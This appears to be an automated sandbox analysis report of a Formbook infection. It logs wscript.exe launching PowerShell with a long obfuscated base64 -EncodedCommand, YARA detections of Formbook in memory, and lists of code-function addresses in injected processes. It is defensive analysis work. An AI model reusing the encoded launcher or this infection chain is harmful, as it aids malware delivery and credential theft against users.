Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg			Jump to behavior

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 16636
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 16636			Jump to behavior

Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04F19000	13_2_04F19000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04F1E7EF	13_2_04F1E7EF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04F18FF2	13_2_04F18FF2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04F18FA8	13_2_04F18FA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04F1E820	13_2_04F1E820
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0835E830	13_2_0835E830
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08356A50	13_2_08356A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08356A50	13_2_08356A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08355430	13_2_08355430
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0836EC40	13_2_0836EC40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08367358	13_2_08367358
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC2EE8	27_2_1EFC2EE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD1EB2	27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08FF63	27_2_1F08FF63
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF0E50	27_2_1EFF0E50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08EFBF	27_2_1F08EFBF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F081FC6	27_2_1F081FC6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD6FE0	27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F012E48	27_2_1F012E48
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F070E6D	27_2_1F070E6D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F080EAD	27_2_1F080EAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F089ED2	27_2_1F089ED2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFDCF00	27_2_1EFDCF00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEFCE0	27_2_1EFEFCE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFE8CDF	27_2_1EFE8CDF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08FD27	27_2_1F08FD27
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F087D4C	27_2_1F087D4C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD3C60	27_2_1EFD3C60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC0C12	27_2_1EFC0C12
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F06FDF4	27_2_1F06FDF4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F04EC20	27_2_1F04EC20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD9DD0	27_2_1EFD9DD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F07EC4C	27_2_1F07EC4C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFE2DB0	27_2_1EFE2DB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F086C69	27_2_1F086C69
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08EC60	27_2_1F08EC60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD0D69	27_2_1EFD0D69
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F069C98	27_2_1F069C98
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F09ACEB	27_2_1F09ACEB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F057CE8	27_2_1F057CE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCAD00	27_2_1EFCAD00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F00DB19	27_2_1F00DB19
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08FB2E	27_2_1F08FB2E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEFAA0	27_2_1EFEFAA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F044BC0	27_2_1F044BC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08CA13	27_2_1F08CA13
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08EA5B	27_2_1F08EA5B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08FA89	27_2_1F08FA89
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD0B10	27_2_1EFD0B10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD28C0	27_2_1EFD28C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFE6882	27_2_1EFE6882
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD9870	27_2_1EFD9870
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEB870	27_2_1EFEB870
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFB6868	27_2_1EFB6868
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08E9A6	27_2_1F08E9A6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F0159C0	27_2_1F0159C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFFE810	27_2_1EFFE810
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD3800	27_2_1EFD3800
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F070835	27_2_1F070835
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCE9A0	27_2_1EFCE9A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F045870	27_2_1F045870
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08F872	27_2_1F08F872
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F0498B2	27_2_1F0498B2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F0818DA	27_2_1F0818DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F0878F3	27_2_1F0878F3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFCC6E0	27_2_1EFCC6E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F086757	27_2_1F086757
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD0680	27_2_1EFD0680
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFF4670	27_2_1EFF4670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEC600	27_2_1EFEC600
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F06D62C	27_2_1F06D62C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F07D646	27_2_1F07D646
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD2760	27_2_1EFD2760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFDA760	27_2_1EFDA760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08A6C0	27_2_1F08A6C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F0436EC	27_2_1F0436EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08F6F6	27_2_1F08F6F6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F09A526	27_2_1F09A526
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD0445	27_2_1EFD0445
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08F5C9	27_2_1F08F5C9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F0875C6	27_2_1F0875C6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F03D480	27_2_1F03D480
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBD2EC	27_2_1EFBD2EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08F330	27_2_1F08F330
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F08124C	27_2_1F08124C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC1380	27_2_1EFC1380
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFDE310	27_2_1EFDE310
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F09010E	27_2_1F09010E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFDB0D0	27_2_1EFDB0D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F06D130	27_2_1F06D130
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFC00A0	27_2_1EFC00A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFEB1E0	27_2_1EFEB1E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFD51C0	27_2_1EFD51C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F07E076	27_2_1F07E076
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F00508C	27_2_1F00508C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1EFBF113	27_2_1EFBF113
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F0870F1	27_2_1F0870F1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050BA526	32_2_050BA526
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF0445	32_2_04FF0445
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AF5C9	32_2_050AF5C9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050A75C6	32_2_050A75C6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0505D480	32_2_0505D480
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FEC6E0	32_2_04FEC6E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050A6757	32_2_050A6757
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF0680	32_2_04FF0680
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0500C600	32_2_0500C600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0508D62C	32_2_0508D62C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0509D646	32_2_0509D646
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05014670	32_2_05014670
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF2760	32_2_04FF2760
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FFA760	32_2_04FFA760
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AA6C0	32_2_050AA6C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050636EC	32_2_050636EC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AF6F6	32_2_050AF6F6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050B010E	32_2_050B010E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FFB0D0	32_2_04FFB0D0
